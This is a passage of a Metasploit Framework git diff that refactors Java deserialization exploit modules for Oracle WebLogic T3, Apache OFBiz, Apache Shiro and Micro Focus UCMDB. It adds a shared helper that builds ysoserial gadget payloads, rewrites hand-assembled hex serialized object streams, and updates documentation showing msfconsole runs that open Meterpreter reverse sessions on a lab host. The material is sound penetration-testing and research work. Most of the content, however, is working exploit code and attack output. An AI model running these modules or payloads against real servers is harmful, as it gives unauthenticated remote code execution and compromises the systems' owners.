diff --git a/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md b/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md index 56504076ec..64282e7f35 100644 --- a/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md +++ b/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md @@ -10,12 +10,8 @@ versions prior to 17.12.04. You can use . -1. Initialize the database with demo data (`INIT_DB=2`) - * `docker run --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12` -1. Start a postgres instance - * `docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres` -1. Link the database and OFBiz containers - * `docker run -d -p 80:8080 -p 8443:8443 --link some-postgres:postgres opensourceknight/ofbiz:15.12` +1. Initialize the database with demo data (`INIT_DB=2`) and bind to ports 8080 and 8443 + * `docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12` ## Verification Steps diff --git a/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md index 6b52b1e083..dc6e9409d8 100644 --- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md +++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md @@ -1,38 +1,38 @@ ## Description - Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2016-3510), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80. +Oracle WebLogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2016-3510), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle WebLogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80. ## Vulnerable Application - Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0. +Oracle WebLogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0. ## Verification Steps - 1. `./msfconsole -q` - 2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject` - 3. `set rhosts ` - 4. `set rport ` - 5. `exploit` +1. `./msfconsole -q` +2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject` +3. `set rhosts ` +4. `set rport ` +5. `exploit` ## Scenarios -### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80 - ``` - msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rhost 192.168.192.6 - rhost => 192.168.192.6 - msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rport 7001 - rport => 7001 - msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > exploit - - [*] Started reverse TCP handler on 192.168.192.136:4444 - [*] 192.168.192.6:7001 - Sending handshake... - [*] 192.168.192.6:7001 - Sending T3 request object... - [*] 192.168.192.6:7001 - Sending client object payload... - [*] Sending stage (179779 bytes) to 192.168.192.6 - [*] Meterpreter session 8 opened (192.168.192.136:4444 -> 192.168.192.6:49276) at 2018-12-14 11:44:30 -0800 +### Windows 7 x64 running Oracle WebLogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80 +``` +msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rhost 192.168.192.6 +rhost => 192.168.192.6 +msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rport 7001 +rport => 7001 +msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > exploit - meterpreter > sysinfo - Computer : GIOTTO-HS-W7 - OS : Windows 7 (Build 7600). - Architecture : x64 - System Language : en_US - Domain : WORKGROUP - Logged On Users : 2 - Meterpreter : x86/windows - ``` +[*] Started reverse TCP handler on 192.168.192.136:4444 +[*] 192.168.192.6:7001 - Sending handshake... +[*] 192.168.192.6:7001 - Sending T3 request object... +[*] 192.168.192.6:7001 - Sending client object payload... +[*] Sending stage (179779 bytes) to 192.168.192.6 +[*] Meterpreter session 8 opened (192.168.192.136:4444 -> 192.168.192.6:49276) at 2018-12-14 11:44:30 -0800 + +meterpreter > sysinfo +Computer : GIOTTO-HS-W7 +OS : Windows 7 (Build 7600). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/windows +``` diff --git a/documentation/modules/exploit/multi/misc/weblogic_deserialize_rawobject.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize_rawobject.md index 994668d1de..ee45e4bb82 100644 --- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_rawobject.md +++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_rawobject.md @@ -1,11 +1,11 @@ ## Description - Oracle Weblogic Server v10.3.6.0, v12.1.2.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2015-4852), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80. +Oracle WebLogic Server v10.3.6.0, v12.1.2.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2015-4852), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle WebLogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80. Note that successful exploitation will output the following warning to the admin server console: ``` - ` - 4. `set rport ` - 5. `exploit` +1. `./msfconsole -q` +2. `use exploit/multi/misc/weblogic_deserialize_rawobject` +3. `set rhosts ` +4. `set rport ` +5. `exploit` ## Scenarios -### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80 - ``` - msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rhost 192.168.192.6 - rhost => 192.168.192.6 - msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rport 7001 - rport => 7001 - msf exploit(multi/misc/weblogic_deserialize_rawobject) > exploit +### Windows 7 x64 running Oracle WebLogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80 +``` +msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rhost 192.168.192.6 +rhost => 192.168.192.6 +msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rport 7001 +rport => 7001 +msf exploit(multi/misc/weblogic_deserialize_rawobject) > exploit - [*] Started reverse TCP handler on 192.168.192.136:4444 - [*] 192.168.192.6:7001 - Sending handshake... - [*] 192.168.192.6:7001 - Sending T3 request object... - [*] 192.168.192.6:7001 - Sending client object payload... - [*] Sending stage (179779 bytes) to 192.168.192.6 - [*] Meterpreter session 7 opened (192.168.192.136:4444 -> 192.168.192.6:49266) at 2018-12-14 11:40:29 -0800 - - meterpreter > sysinfo - Computer : GIOTTO-HS-W7 - OS : Windows 7 (Build 7600). - Architecture : x64 - System Language : en_US - Domain : WORKGROUP - Logged On Users : 2 - Meterpreter : x86/windows - ``` +[*] Started reverse TCP handler on 192.168.192.136:4444 +[*] 192.168.192.6:7001 - Sending handshake... +[*] 192.168.192.6:7001 - Sending T3 request object... +[*] 192.168.192.6:7001 - Sending client object payload... +[*] Sending stage (179779 bytes) to 192.168.192.6 +[*] Meterpreter session 7 opened (192.168.192.136:4444 -> 192.168.192.6:49266) at 2018-12-14 11:40:29 -0800 + +meterpreter > sysinfo +Computer : GIOTTO-HS-W7 +OS : Windows 7 (Build 7600). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/windows +``` diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb index 9e4603fa8d..90fcd1f7c9 100644 --- a/lib/msf/core/encoded_payload.rb +++ b/lib/msf/core/encoded_payload.rb @@ -466,6 +466,15 @@ class EncodedPayload end end + # + # An array containing the platform(s) that this payload was made to run on + # + def platform + if pinst + pinst.platform + end + end + # # The raw version of the payload # diff --git a/lib/msf/core/exploit/java_deserialization.rb b/lib/msf/core/exploit/java_deserialization.rb new file mode 100644 index 0000000000..43c03456a7 --- /dev/null +++ b/lib/msf/core/exploit/java_deserialization.rb @@ -0,0 +1,44 @@ +# -*- coding: binary -*- + +module Msf + +module Exploit::JavaDeserialization + + include Msf::Exploit::Powershell + + def generate_java_deserialization_for_command(name, shell, command) + # here we force usage of a modified type to avoid compatibility issues with command characters thar are present in + # some ysoserial payloads + unless %w{ bash cmd powershell }.include? shell + raise RuntimeError, 'Invalid shell for Java Deserialization payload generation' + end + + Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: shell) + end + + def generate_java_deserialization_for_payload(name, payload) + command = nil + + if payload.platform.platforms == [Msf::Module::Platform::Windows] + if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? payload.arch.first + command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true, encode_final_payload: true }) + elsif payload.arch.first == Rex::Arch::ARCH_CMD + command = payload.encoded + end + modified_type = 'cmd' + else + if payload.arch.first == Rex::Arch::ARCH_CMD + command = payload.encoded + end + modified_type = 'bash' + end + + if command.nil? + raise RuntimeError, 'Could not generate the payload for the platform/architecture combination' + end + + Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: modified_type) + end + +end +end diff --git a/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb b/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb index 124cd766ca..f04d6ed879 100644 --- a/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb +++ b/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb @@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager + include Msf::Exploit::JavaDeserialization def initialize(info = {}) super( @@ -43,9 +44,6 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, - 'Payload' => { - 'BadChars' => ' ' - }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python_ssl' } @@ -105,19 +103,16 @@ class MetasploitModule < Msf::Exploit::Remote when :unix_cmd execute_command(payload.encoded) when :linux_dropper - execute_cmdstager(nospace: true) + execute_cmdstager end end def execute_command(cmd, _opts = {}) - # XXX: Execute commands in a shell - cmd.prepend('sh -c ') - vprint_status("Executing command: #{cmd}") res = send_request_xmlrpc( # framework/webapp/lib/rome-0.9.jar - Msf::Util::JavaDeserialization.ysoserial_payload('ROME', cmd) + generate_java_deserialization_for_command('ROME', 'bash', cmd) ) unless res && res.code == 200 diff --git a/modules/exploits/multi/http/microfocus_ucmdb_unauth_deser.rb b/modules/exploits/multi/http/microfocus_ucmdb_unauth_deser.rb index 5719236fe0..ba1001e61f 100644 --- a/modules/exploits/multi/http/microfocus_ucmdb_unauth_deser.rb +++ b/modules/exploits/multi/http/microfocus_ucmdb_unauth_deser.rb @@ -63,10 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'unix', 'Arch' => [ARCH_CMD], 'DefaultOptions' => - # Metasploit ysoserial's Linux payloads are currently BROKEN! - # So we need to default to cmd/unix/generic, which is the only that works now. - # Once this is fixed, change the default to cmd/unix/reverse_python - # ... and remove this comment. { 'PAYLOAD' => 'cmd/unix/generic' } }, ] diff --git a/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb b/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb index 35820ee57e..5fb63967ad 100644 --- a/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb +++ b/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb @@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Powershell + include Msf::Exploit::JavaDeserialization def initialize(info = {}) super( @@ -77,8 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit cmd = payload.encoded vprint_status("Execute CMD: #{cmd}") - type = (target.name == 'Unix Command payload' ? 'bash' : 'cmd') - java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type) + java_payload = generate_java_deserialization_for_payload('CommonsCollections2', payload) ciphertext = aes_encrypt(java_payload) base64_ciphertext = Rex::Text.encode_base64(ciphertext) diff --git a/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb b/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb index 80f08b3755..cd8f7e0f62 100644 --- a/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb +++ b/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb @@ -8,8 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp - #include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Powershell + include Msf::Exploit::JavaDeserialization def initialize(info={}) super(update_info(info, @@ -39,9 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => ARCH_CMD, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}, 'Payload' => { - 'Encoder' => 'cmd/ifs', - 'BadChars' => ' ', - 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'} + 'Compat' => {'PayloadType' => 'cmd'} } ], [ 'Windows', @@ -333,165 +330,157 @@ class MetasploitModule < Msf::Exploit::Remote end def send_payload_objdata - # payload creation - if target.name == 'Windows' - pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true}) - elsif target.name == 'Unix' || target.name == 'Solaris' - nix_cmd = payload.encoded - end - # basic weblogic ClassTableEntry object (serialized) # TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT? - payload = '056508000000010000001b0000005d0101007372017870737202787000000000' - payload << '00000000757203787000000000787400087765626c6f67696375720478700000' - payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306' + objdata = '056508000000010000001b0000005d0101007372017870737202787000000000' + objdata << '00000000757203787000000000787400087765626c6f67696375720478700000' + objdata << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306' - payload << 'fe010000' # ----- separator ----- + objdata << 'fe010000' # ----- separator ----- - payload << 'aced0005' # JSO v5 header - payload << '73' # object header - payload << '72' # class - payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry - payload << '73735461626c65456e747279' # (cont) - payload << '2f52658157f4f9ed' # serialVersionUID - payload << '0c' # EXTERNALIZABLE | BLOCKDATA - payload << '0000' # fieldCount = 0 - payload << '7870' # remaining object header - payload << '72' # class header - payload << '00025b42' # Name: 0x5b42 - payload << 'acf317f8060854e0' # serialVersionUID - payload << '02' # SERIALIZABLE - payload << '0000' # fieldCount = 0 - payload << '7870' # class footer - payload << '77' # block header - payload << '020000' # contents = 0x0000 - payload << '78' # block footer + objdata << 'aced0005' # JSO v5 header + objdata << '73' # object header + objdata << '72' # class + objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry + objdata << '73735461626c65456e747279' # (cont) + objdata << '2f52658157f4f9ed' # serialVersionUID + objdata << '0c' # EXTERNALIZABLE | BLOCKDATA + objdata << '0000' # fieldCount = 0 + objdata << '7870' # remaining object header + objdata << '72' # class header + objdata << '00025b42' # Name: 0x5b42 + objdata << 'acf317f8060854e0' # serialVersionUID + objdata << '02' # SERIALIZABLE + objdata << '0000' # fieldCount = 0 + objdata << '7870' # class footer + objdata << '77' # block header + objdata << '020000' # contents = 0x0000 + objdata << '78' # block footer - payload << 'fe010000' # ----- separator ----- + objdata << 'fe010000' # ----- separator ----- - payload << 'aced0005' # JSO v5 header - payload << '73' # object header - payload << '72' # class - payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry - payload << '73735461626c65456e747279' # (cont) - payload << '2f52658157f4f9ed' # serialVersionUID - payload << '0c' # EXTERNALIZABLE | BLOCKDATA - payload << '0000' # fieldCount = 0 - payload << '7870' # remaining object header - payload << '72' # class header + objdata << 'aced0005' # JSO v5 header + objdata << '73' # object header + objdata << '72' # class + objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry + objdata << '73735461626c65456e747279' # (cont) + objdata << '2f52658157f4f9ed' # serialVersionUID + objdata << '0c' # EXTERNALIZABLE | BLOCKDATA + objdata << '0000' # fieldCount = 0 + objdata << '7870' # remaining object header + objdata << '72' # class header - payload << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object; - payload << '6563743b' # (cont) - payload << '90ce589f1073296c' # serialVersionUID - payload << '02' # SERIALIZABLE - payload << '0000' # fieldCount = 0 - payload << '7870' # remaining object header - payload << '77' # block header - payload << '020000' # contents = 0x0000 - payload << '78' # block footer + objdata << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object; + objdata << '6563743b' # (cont) + objdata << '90ce589f1073296c' # serialVersionUID + objdata << '02' # SERIALIZABLE + objdata << '0000' # fieldCount = 0 + objdata << '7870' # remaining object header + objdata << '77' # block header + objdata << '020000' # contents = 0x0000 + objdata << '78' # block footer - payload << 'fe010000' # ----- separator ----- + objdata << 'fe010000' # ----- separator ----- - payload << 'aced0005' # JSO v5 header - payload << '73' # object header - payload << '72' # class + objdata << 'aced0005' # JSO v5 header + objdata << '73' # object header + objdata << '72' # class - payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry - payload << '73735461626c65456e747279' # (cont) - payload << '2f52658157f4f9ed' # serialVersionUID - payload << '0c' # SERIALIZABLE | BLOCKDATA - payload << '0000' # fieldCount = 0 - payload << '7870' # block footer - payload << '72' # class header - payload << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector - payload << 'd9977d5b803baf01' # serialVersionUID - payload << '03' # WRITE_METHOD | SERIALIZABLE - payload << '0003' # fieldCount = 3 - payload << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement - payload << '49000c656c656d656e74436f756e74' # 1: Int: elementCount - payload << '5b000b656c656d656e7444617461' # 2: Array: elementData - payload << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object; - payload << '743b' # (cont) - payload << '7870' # remaining object header - payload << '77' # block header - payload << '020000' # contents = 0x0000 - payload << '78' # block footer + objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry + objdata << '73735461626c65456e747279' # (cont) + objdata << '2f52658157f4f9ed' # serialVersionUID + objdata << '0c' # SERIALIZABLE | BLOCKDATA + objdata << '0000' # fieldCount = 0 + objdata << '7870' # block footer + objdata << '72' # class header + objdata << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector + objdata << 'd9977d5b803baf01' # serialVersionUID + objdata << '03' # WRITE_METHOD | SERIALIZABLE + objdata << '0003' # fieldCount = 3 + objdata << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement + objdata << '49000c656c656d656e74436f756e74' # 1: Int: elementCount + objdata << '5b000b656c656d656e7444617461' # 2: Array: elementData + objdata << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object; + objdata << '743b' # (cont) + objdata << '7870' # remaining object header + objdata << '77' # block header + objdata << '020000' # contents = 0x0000 + objdata << '78' # block footer - payload << 'fe010000' # ----- separator ----- + objdata << 'fe010000' # ----- separator ----- # payload generated from ysoserial and wrapped in a MarshalledObject: - payload << 'aced0005' # JSO v5 header - payload << '73' # object header - payload << '72' # class header + objdata << 'aced0005' # JSO v5 header + objdata << '73' # object header + objdata << '72' # class header - payload << '00257765626c6f6769632e636f7262612e757469' # Name = weblogic.corba.utils.MarshalledObject - payload << '6c732e4d61727368616c6c65644f626a656374' # (cont) - payload << '592161d5f3d1dbb6' # serialVersionUID - payload << '02' # SERIALIZABLE - payload << '0002' # fieldCount = 2 - payload << '49000468617368' # 0: Int: hash - payload << '5b00086f626a4279746573' # 1: Array: objBytes - payload << '7400025b42' # Value: 0x5b42 - payload << '7870' # class footer + objdata << '00257765626c6f6769632e636f7262612e757469' # Name = weblogic.corba.utils.MarshalledObject + objdata << '6c732e4d61727368616c6c65644f626a656374' # (cont) + objdata << '592161d5f3d1dbb6' # serialVersionUID + objdata << '02' # SERIALIZABLE + objdata << '0002' # fieldCount = 2 + objdata << '49000468617368' # 0: Int: hash + objdata << '5b00086f626a4279746573' # 1: Array: objBytes + objdata << '7400025b42' # Value: 0x5b42 + objdata << '7870' # class footer # class Data: - payload << '21210fdc' # hash = 0x21210fdc (555814876d) - payload << '757200025b42' # objBytes = [ 0x5b42 ] - payload << 'acf317f8060854e0' # serialVersionUID - payload << '02' # SERIALIZABLE - payload << '0000' # fieldCount = 0 - payload << '7870' # class footer - payload << '0000' # arraySize (first two bytes) - payload << (pwrshl.length + 1392).to_s(16).rjust(4,'0')# arraySize (lower two bytes) - # 1392 is there because of the 0x0600 constant below + objdata << '21210fdc' # hash = 0x21210fdc (555814876d) + objdata << '757200025b42' # objBytes = [ 0x5b42 ] + objdata << 'acf317f8060854e0' # serialVersionUID + objdata << '02' # SERIALIZABLE + objdata << '0000' # fieldCount = 0 + objdata << '7870' # class footer + objdata << '0000' # arraySize (first two bytes) # java -jar ysoserial-0.0.5-all.jar CommonsCollections1 calc.exe - ysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload("CommonsCollections1",pwrshl) - payload << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join + java_payload = generate_java_deserialization_for_payload('CommonsCollections1', payload) + objdata << (java_payload.length).to_s(16).rjust(4, '0')# arraySize (lower two bytes) + objdata << java_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join # basic weblogic ImmutableServiceContext object (serialized) - payload << 'fe010000' # ----- separator ----- + objdata << 'fe010000' # ----- separator ----- - payload << 'aced0005' # JSO v5 header - payload << '73' # object header - payload << '72' # class - payload << '00257765626c6f6769632e726a766d2e496d6d75' # Name = weblogic.rjvm.ImmutableServiceContext - payload << '7461626c6553657276696365436f6e74657874' # (cont) - payload << 'ddcba8706386f0ba' # serialVersionUID - payload << '0c' # SERIALIZABLE | BLOCKDATA - payload << '0000' # fieldCount = 0 - payload << '78' # remainder of object header - payload << '72' # class header - payload << '00297765626c6f6769632e726d692e70726f7669' # Name: weblogic.rmi.provider.BasicServiceContext - payload << '6465722e426173696353657276696365436f6e74' # (cont) - payload << '657874' # (cont) - payload << 'e4632236c5d4a71e' # serialVersionUID - payload << '0c' # SERIALIZABLE | BLOCKDATA - payload << '0000' # fieldCount = 0 - payload << '78' # block footer - payload << '70' # TC_NULL - payload << '77' # block header - payload << '020600' # Contents: 0x0600 (1536d) ### LENGTH OFFSET ADDED BELOW #TODO: WHY? - payload << '73' # object header - payload << '72' # class description - payload << '00267765626c6f6769632e726d692e696e746572' # Name = weblogic.rmi.internal.MethodDescriptor - payload << '6e616c2e4d6574686f6444657363726970746f72' # (cont) - payload << '12485a828af7f67b' # serialVersionUID - payload << '0c' # EXTERNALIZABLE | BLOCKDATA - payload << '0000' # fieldCount = 0 - payload << '78' # block footer - payload << '70' # TC_NULL - payload << '77' # block header - payload << '34002e61757468656e746963617465284c776562' # HEX-ASCII: authenticate(Lweblogic.security.acl.UserInfo;) - payload << '6c6f6769632e73656375726974792e61636c2e55' # (cont) - payload << '736572496e666f3b290000001b' # (cont) - payload << '78' # block footer - payload << '78' # object footer + objdata << 'aced0005' # JSO v5 header + objdata << '73' # object header + objdata << '72' # class + objdata << '00257765626c6f6769632e726a766d2e496d6d75' # Name = weblogic.rjvm.ImmutableServiceContext + objdata << '7461626c6553657276696365436f6e74657874' # (cont) + objdata << 'ddcba8706386f0ba' # serialVersionUID + objdata << '0c' # SERIALIZABLE | BLOCKDATA + objdata << '0000' # fieldCount = 0 + objdata << '78' # remainder of object header + objdata << '72' # class header + objdata << '00297765626c6f6769632e726d692e70726f7669' # Name: weblogic.rmi.provider.BasicServiceContext + objdata << '6465722e426173696353657276696365436f6e74' # (cont) + objdata << '657874' # (cont) + objdata << 'e4632236c5d4a71e' # serialVersionUID + objdata << '0c' # SERIALIZABLE | BLOCKDATA + objdata << '0000' # fieldCount = 0 + objdata << '78' # block footer + objdata << '70' # TC_NULL + objdata << '77' # block header + objdata << '020600' # Contents: 0x0600 (1536d) ### LENGTH OFFSET ADDED BELOW #TODO: WHY? + objdata << '73' # object header + objdata << '72' # class description + objdata << '00267765626c6f6769632e726d692e696e746572' # Name = weblogic.rmi.internal.MethodDescriptor + objdata << '6e616c2e4d6574686f6444657363726970746f72' # (cont) + objdata << '12485a828af7f67b' # serialVersionUID + objdata << '0c' # EXTERNALIZABLE | BLOCKDATA + objdata << '0000' # fieldCount = 0 + objdata << '78' # block footer + objdata << '70' # TC_NULL + objdata << '77' # block header + objdata << '34002e61757468656e746963617465284c776562' # HEX-ASCII: authenticate(Lweblogic.security.acl.UserInfo;) + objdata << '6c6f6769632e73656375726974792e61636c2e55' # (cont) + objdata << '736572496e666f3b290000001b' # (cont) + objdata << '78' # block footer + objdata << '78' # object footer - payload << 'fe00ff' # this cruft again. some kind of footer + objdata << 'fe00ff' # this cruft again. some kind of footer # sets the length of the stream - data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0') - data << payload + data = ((objdata.length >> 1) + 4).to_s(16).rjust(8,'0') + data << objdata sock.put([data].pack('H*')) sleep(1) diff --git a/modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb b/modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb index 3ee9b57269..a6a3929cb1 100644 --- a/modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb +++ b/modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb @@ -8,8 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp - #include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Powershell + include Msf::Exploit::JavaDeserialization def initialize(info={}) super(update_info(info, @@ -39,9 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => ARCH_CMD, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}, 'Payload' => { - 'Encoder' => 'cmd/ifs', - 'BadChars' => ' ', - 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'} + 'Compat' => {'PayloadType' => 'cmd'} } ], [ 'Windows', @@ -345,7 +342,7 @@ class MetasploitModule < Msf::Exploit::Remote data << '77' # block header data << '20' # length = 32 bytes data << '0114dc42bd071a772700' # old string = ??? UNKNOWN ??? - #data << rand_text_alphanumeric(10).unpack('H*')[0] # (NOTE: RANDOMIZAITON BREAKS THINGS) + #data << rand_text_alphanumeric(10).unpack('H*')[0] # (NOTE: RANDOMIZATION BREAKS THINGS) data << '0d' # string length = 13 bytes (NOTE: do not edit) #data << '3234322e3231342e312e323534' # original string = 242.214.1.254 @@ -364,140 +361,133 @@ class MetasploitModule < Msf::Exploit::Remote end def send_payload_objdata - # payload creation - if target.name == 'Windows' - mycmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true}) - elsif target.name == 'Unix' || target.name == 'Solaris' - mycmd = payload.encoded - end - # basic weblogic ClassTableEntry object (serialized) # TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT? - payload = '056508000000010000001b0000005d0101007372017870737202787000000000' - payload << '00000000757203787000000000787400087765626c6f67696375720478700000' - payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306' + objdata = '056508000000010000001b0000005d0101007372017870737202787000000000' + objdata << '00000000757203787000000000787400087765626c6f67696375720478700000' + objdata << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306' - payload << 'fe010000' # ----- separator ----- + objdata << 'fe010000' # ----- separator ----- - payload << 'aced0005' # JSO v5 header - payload << '73' # object header - payload << '72' # class - payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry - payload << '73735461626c65456e747279' # (cont) - payload << '2f52658157f4f9ed' # serialVersionUID - payload << '0c' # EXTERNALIZABLE | BLOCKDATA - payload << '0000' # fieldCount = 0 - payload << '7870' # remaining object header - payload << '72' # class header - payload << '00025b42' # Name: 0x5b42 - payload << 'acf317f8060854e0' # serialVersionUID - payload << '02' # SERIALIZABLE - payload << '0000' # fieldCount = 0 - payload << '7870' # class footer - payload << '77' # block header - payload << '020000' # contents = 0x0000 - payload << '78' # block footer + objdata << 'aced0005' # JSO v5 header + objdata << '73' # object header + objdata << '72' # class + objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry + objdata << '73735461626c65456e747279' # (cont) + objdata << '2f52658157f4f9ed' # serialVersionUID + objdata << '0c' # EXTERNALIZABLE | BLOCKDATA + objdata << '0000' # fieldCount = 0 + objdata << '7870' # remaining object header + objdata << '72' # class header + objdata << '00025b42' # Name: 0x5b42 + objdata << 'acf317f8060854e0' # serialVersionUID + objdata << '02' # SERIALIZABLE + objdata << '0000' # fieldCount = 0 + objdata << '7870' # class footer + objdata << '77' # block header + objdata << '020000' # contents = 0x0000 + objdata << '78' # block footer - payload << 'fe010000' # ----- separator ----- + objdata << 'fe010000' # ----- separator ----- - payload << 'aced0005' # JSO v5 header - payload << '73' # object header - payload << '72' # class - payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry - payload << '73735461626c65456e747279' # (cont) - payload << 